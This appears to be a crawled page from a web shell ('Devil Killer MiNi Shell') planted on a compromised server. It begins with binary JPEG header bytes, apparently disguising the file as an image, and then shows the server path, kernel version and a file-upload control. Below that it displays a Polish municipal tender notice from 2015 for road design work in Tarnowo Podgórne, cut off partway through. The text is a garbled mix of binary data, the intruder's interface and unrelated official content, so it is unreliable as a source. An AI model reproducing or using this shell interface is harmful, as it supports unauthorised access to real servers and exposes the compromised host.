JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150305/48430-N-2015.html

<p class="kh_header"><b>Tarnowo Podgórne: wykonanie projektów przebudowy dróg</b><br>
<b>Numer ogłoszenia: 48430 - 2015; data zamieszczenia: 05.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Tarnowo Podgórne , ul. Poznańska 115, 62-080 Tarnowo Podgórne, woj. wielkopolskie, tel. 061 8146-221, faks (061) 814 61 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnowo-podgorne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie projektów przebudowy dróg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej wraz z nadzorem autorskim dla następujących zadań:
I. przebudowa pasa drogowego - budowa ścieżki pieszo-rowerowej Lusowo-Tarnowo Podgórne Ul. Wierzbowa  (od ul. Poznańskiej do ul. Świt),
II. budowa/przebudowa ulic Kalinowej, Modrakowej, Gerberowej i Wrzosowej w Tarnowie Podgórnym,
III. przebudowa ulic Wspólnej i Przemysława w Baranowie,
IV. przebudowa ul. Morelowej w Przeźmierowie (włączenie drogi do ul. Wiosny Ludów).

Zamawiający żąda wskazania przez wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest doświadczenie zawodowe w zakresie realizacji prac porównywalnych z przedmiotem zamówienia (udokumentują wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 dokumentacji projektowych w zakresie budowy lub przebudowy dróg, każda o wartości co najmniej: część 1 - 20 000,00zł. brutto; część 2 - 30 000,00zł. brutto; część 3 - 40 000,00zł. brutto, część 4 - 3 000,00zł.)
Jeżeli wykonawca składa ofertę na więcej niż jedną część, Zamawiający dopuszcza wykazanie tych samych usług dla tych części.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał kadrowy - osoby realizujące zamówienie muszą posiadać stosowne:
Część 1 - uprawnienia do projektowania w branży drogowej, 
Część 2 - uprawnienia do projektowania w branży drogowej, 
Część 3 - uprawnienia do projektowania w branży drogowej, 
Część 4 - uprawnienia do projektowania w branży drogowej, uprawnienia do projektowania w branży kanalizacyjnej.
Zamawiający dopuszcza wskazanie jednej osoby z danymi uprawnieniami dla wszystkich części, jeżeli wykonawca składa ofertę na więcej niż jedną część. 
Do oferty wykonawca składa oświadczenie w formie wykazu wg wzoru załączonego do siwz, przed podpisaniem umowy wybrany wykonawca zobowiązany jest przedstawić dokumenty, potwierdzające posiadanie uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie usług, o którym mowa powyżej i złożenia poświadczeń dotyczy tylko usług, które potwierdzają spełnianie warunku wiedzy i doświadczenia, o którym mowa w pkt. 8b SIWZ.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	ofertę zgodną z formularzem oferty stanowiącym załącznik nr 1 do specyfikacji,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin wykonania etapu I - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany terminu umowy wyłącznie z przyczyn niezależnych od Wykonawcy i mających wpływ na wykonanie przedmiotu umowy, w szczególności w następujących przypadkach:
1)	Siły wyższej, to znaczy niezależnego od stron losowego zdarzenia zewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec mimo dochowania należytej staranności. Za siłę wyższą, warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
2)	Wezwania przez organy administracji publicznej lub inne upoważnione podmioty do uzupełnienia przedmiotu umowy pod warunkiem, że w momencie złożenia do organu, przedmiot zamówienia lub jego część był kompletny z punktu widzenia umowy i właściwych przepisów,
3)	Przekroczenia przewidzianych przepisami prawa terminów trwania procedur administracyjnych, liczonych zgodnie z zasadami określonymi w kodeksie postepowania administracyjnego;
4)	Szczególnie uzasadnionych trudności w pozyskiwaniu materiałów wyjściowych do realizacji umowy, o których Wykonawca zobowiązany jest niezwłocznie powiadomić Zamawiającego,
5)	Zmiany przepisów prawa;
6)	Udzielenia wykonawcy zamówienia dodatkowego;
7)	Wydania polecenia zmiany.
Wykonawca, wnioskując o zmianę terminu realizacji przedmiotu zamówienia, zobowiązany jest udowodnić Zamawiającemu, iż zaszły ww. okoliczności. 
W przypadku wystąpienia przeszkód lub przerw w wykonywaniu prac, Wykonawca ma obowiązek niezwłocznie zgłosić je Zamawiającemu na piśmie w celu rozstrzygnięcia o wynikających z tego skutkach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tarnowo-podgorne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2015 godzina 10:00, miejsce: w siedzibie Urzędu Gminy Tarnowo Podgórne, w pokoju nr 119.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wykonanie dokumentacji projektowej przebudowy pasa drogowego - budowa ścieżki pieszo-rowerowej Lusowo-Tarnowo Podgórne ul. Wierzbowa (od ul. Poznańskiej do ul. Świt) wraz z nadzorem autorskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Etap I:
1.	Zakres opracowania: 
Kategoria drogi:
- droga powiatowa
- długość odcinka - około 840 m

Ścieżka pieszo - rowerowa:
- szerokość  2,5 m
- ograniczona krawężnikiem od strony jezdni (istniejący), zakończony opornikiem 
- nawierzchnia z kostki betonowej bezfazowej czerwonej

Pasy zieleni:
-obustronne

Oświetlenie uliczne:
- nie dotyczy  

Odwodnienie:
- istniejące

2.	Wymagania
1.	Rozwiązania projektowe, konstrukcję nawierzchni chodnika, organizację ruchu, itp. na roboczo uzgodnić w Wydziale Infrastruktury Drogowej Urzędu Gminy Tarnowo Podgórne.
2.	Projekt budowlany branży drogowej należy wykonać w 4 egzemplarzach (w tym 2 egz. trwale spięte) oraz projekt wykonawczy w 3 egzemplarzach. Projekt budowlany powinien zawierać wszystkie elementy pozwalające uzyskać pozwolenie na budowę . Projekt wykonawczy winien spełniać wymagania projektu wykonawczego i pozwolić Wykonawcy robót wykonać zadanie.
3.	Projekty branżowe usunięcia kolizji wykonać w 4 egzemplarzach (w tym 2 egz. trwale spięte) oraz projekt wykonawczy w 3 egzemplarzach, (zakres usunięć ewentualnych kolizji przedstawić na roboczo w WID - UGTP). Projekty winny posiadać wszystkie niezbędne uzgodnienia, zgody i zatwierdzenia. Uzgodnienia dołączone do projektów winny być czytelne i opatrzone komentarzem projektanta. 
4.	Przedmiar robót dla poszczególnych branż opracować w 2 egzemplarzach,
5.	Wykonać badania gruntowo-wodne.
6.	Założyć 11 projektów podziałów nieruchomości.
7.	Szczegółowe specyfikacje techniczne wykonania i odbioru robót dla poszczególnych branż opracować w 4 egzemplarzach, 
8.	Kosztorys inwestorski - opracować i uzgodnić z Wydziałem Infrastruktury Drogowej Urzędu Gminy Tarnowo Podgórne - opracować w 2 egzemplarzach,
9.	Dokumentację projektową, przedmiary robót, kosztorysy inwestorskie opracować 
w 2 egzemplarzach w wersji elektronicznej w tym:
- pliki tekstowe - format *.pdf oraz *.tiff, *.xls, *.doc
- pliki graficzne - format *dwg oraz  *pdf i *.tiff
10.	Dokumentację projektową należy opracować na aktualnym podkładzie geodezyjnym (numerycznym) oraz przekazać w wersji *.dwg oraz *.tiff oraz wypisami z rejestru gruntów. 
11.	Badania gruntowo-wodne podłoża w 3 egzemplarzach
12.	Informacja dotycząca bezpieczeństwa i ochrony zdrowia w 4 egzemplarzach
13.	Szczegółowa inwentaryzacja drzew i krzewów (należy uzyskać zgodę na wycinkę, jeżeli zajdzie taka potrzeba) w 4 egzemplarzach
14.Uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej. 

W załączeniu:  mapa sytuacyjna terenu.

Etap II.  
Nadzór autorski nad przebudową pasa drogowego - budowa ścieżki pieszo-rowerowej Lusowo-Tarnowo Podgórne Ul. Wierzbowa  (od ul. Poznańskiej do ul. Świt). 
1. Nadzór autorski pełniony przez Wykonawcę obejmuje:
a) czuwanie w toku realizacji nad zgodnością rozwiązań technicznych, materiałowych użytkowych z dokumentacją projektową i obowiązującymi przepisami, w szczególności techniczno-budowlanymi oraz normami,
b) uzupełnienie szczegółów dokumentacji projektowej oraz wyjaśnienie Wykonawcy robót wątpliwości powstałych w toku realizacji,
c) uzgodnienie z inwestorem i wykonawcą możliwości wprowadzenia rozwiązań zamiennych w stosunku do materiałów i konstrukcji przewidzianych w dokumentacji projektowej.



2. Wykonawca pełni nadzór autorski w formie pobytów na terenie budowy w terminach uzgodnionych z Zamawiającym w miarę potrzeb realizacyjnych, jednakże nie mniej niż jeden pobyt na budowie w ciągu miesiąca). 
3. Za nadzór autorski uważa się również wykonanie przez projektanta niezbędnych do pełnienia nadzoru autorskiego czynności poza terenem budowy, a w szczególności konsultacje z wytwórcą lub dostawcą maszyn, urządzeń, materiałów, uzgodnienia w siedzibie 
zamawiającego, Wykonawcy, względnie w siedzibie organu administracji państwowej lub gospodarczej albo innej osoby trzeciej w związku z realizacją zadania.
Termin pełnienia nadzoru: do czasu zakończenia budowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 165.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin wykonania etapu I - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wykonanie dokumentacji projektowej budowy/przebudowy ulic Kalinowej, Modrakowej, Gerberowej i Wrzosowej w Tarnowie Podgórnym wraz z nadzorem autorskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Etap I
1. Zakres opracowania
Kategoria dróg:
- drogi wewnętrzne
- długość odcinków: ul. Kalinowa 230 m, 
                                  ul. Modrakowa 130 m,
                                  ul. Gerberowa 170 m,
                                  ul. Wrzosowa 485 m.     
Łącznie 1015m.

Pieszojezdnia 
- szerokość 5,0 m, w tym 4,0m (nawierzchnia przepuszczalna kolor szary) i 1,0m kostka 
pełna koloru czerwonego,
- ograniczona krawężnikiem 

Pasy zieleni:
- obustronne 

Oświetlenie uliczne:
- nie dotyczy  

Odwodnienie:
- nie dotyczy  

Wjazdy do posesji i dojścia do furtek:
- zaprojektować do szerokości istniejących bram i furtek, jeżeli nie ma bramy szerokość          wjazdu 4,0m 

2.	Wymagania
1.	Rozwiązania projektowe, konstrukcję nawierzchni, organizację ruchu, itp. na roboczo uzgodnić w Wydziale Infrastruktury Drogowej Urzędu Gminy Tarnowo Podgórne (dla każdego etapu).
2.	Projekt budowlany branży drogowej dla każdego etapu należy wykonać w 4 egzemplarzach (w tym 2 egz. trwale spięte) oraz projekt wykonawczy dla każdego etapu w 3 egzemplarzach. Projekt budowlany powinien zawierać wszystkie elementy pozwalające uzyskać pozwolenie na budowę. Projekt wykonawczy winien spełniać wymagania projektu wykonawczego i pozwolić Wykonawcy robót wykonać zadanie. 
3.	Projekty branżowe usunięcia kolizji dla każdego etapu wykonać w 4 egzemplarzach (w tym 2 egz. trwale spięte) oraz projekt wykonawczy dla każdego etapu w 3 egzemplarzach, (zakres usunięć ewentualnych kolizji przedstawić na roboczo w WID - UGTP). Projekty winny posiadać wszystkie niezbędne uzgodnienia, zgody i zatwierdzenia. Uzgodnienia dołączone do projektów winny być czytelne i opatrzone komentarzem projektanta. 
4.	Wykonać badania gruntowo-wodne.
5.	Projekty organizacji ruchu dla każdego etapu (uzgodnione i zatwierdzone) - 6 egz.
6.	Przedmiar robót dla poszczególnych branż opracować w 3 egzemplarzach,
7.	Szczegółowe specyfikacje techniczne wykonania i odbioru robót dla poszczególnych branż opracować w 4 egzemplarzach, 
8.	Kosztorys inwestorski - opracować i uzgodnić z Wydziałem Infrastruktury Drogowej Urzędu Gminy Tarnowo Podgórne - opracować w 2 egzemplarzach,
9.	Dokumentację projektową, przedmiary robót, kosztorysy inwestorskie opracować 
w 2 egzemplarzach w wersji elektronicznej w tym:
- pliki tekstowe - format *.pdf oraz *.tiff, *.xls, *.doc
- pliki graficzne - format *dwg oraz  *pdf i *.tiff
Dla każdego etapu osobno.
10.	Dokumentację projektową należy opracować na aktualnym podkładzie geodezyjnym (numerycznym) oraz przekazać w wersji *.dwg oraz *.tiff oraz wypisami z rejestru gruntów. 
11.	Badania gruntowo-wodne podłoża w 3 egzemplarzach
12.	Informacja dotycząca bezpieczeństwa i ochrony zdrowia w 4 egzemplarzach dla każdego etapu.
13.	Szczegółowa inwentaryzacja drzew i krzewów (należy uzyskać zgodę na wycinkę, jeżeli zajdzie taka potrzeba) w 4 egzemplarzach
14.	Uzyskanie pozwolenia na budowę / zgłoszenie zamiaru budowy (wykonania robót budowlanych)
W załączeniu:  mapa sytuacyjna terenu.

Etap II.  
Nadzór autorski nad budową/przebudową ulic Kalinowej, Modrakowej, Gerberowej i Wrzosowej w Tarnowie Podgórnym.
1. Nadzór autorski pełniony przez Wykonawcę obejmuje:
a) czuwanie w toku realizacji nad zgodnością rozwiązań technicznych, materiałowych użytkowych z dokumentacją projektową i obowiązującymi przepisami, w szczególności techniczno-budowlanymi oraz normami,
b) uzupełnienie szczegółów dokumentacji projektowej oraz wyjaśnienie Wykonawcy robót wątpliwości powstałych w toku realizacji,
c) uzgodnienie z inwestorem i wykonawcą możliwości wprowadzenia rozwiązań zamiennych w stosunku do materiałów i konstrukcji przewidzianych w dokumentacji projektowej.
2. Wykonawca pełni nadzór autorski w formie pobytów na terenie budowy w terminach uzgodnionych z Zamawiającym w miarę potrzeb realizacyjnych, jednakże nie mniej niż jeden pobyt na budowie w ciągu miesiąca). 
3. Za nadzór autorski uważa się również wykonanie przez projektanta niezbędnych do pełnienia nadzoru autorskiego czynności poza terenem budowy, a w szczególności konsultacje z wytwórcą lub dostawcą maszyn, urządzeń, materiałów, uzgodnienia w siedzibie zamawiającego, Wykonawcy, względnie w siedzibie organu administracji państwowej lub gospodarczej albo innej osoby trzeciej w związku z realizacją zadania.
Termin pełnienia nadzoru: do czasu zakończenia budowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin wykonania etapu I - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wykonanie dokumentacji projektowej przebudowy ulic Wspólnej i Przemysława w Baranowie  wraz z nadzorem autorskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Etap I
1.	Zakres opracowania
Kategoria dróg:
- drogi wewnętrzne
- długość odcinków: ul. Wspólna 625 m, 
                                  ul. Przemysława 350 m.
Łącznie 975m.

Jezdnia 
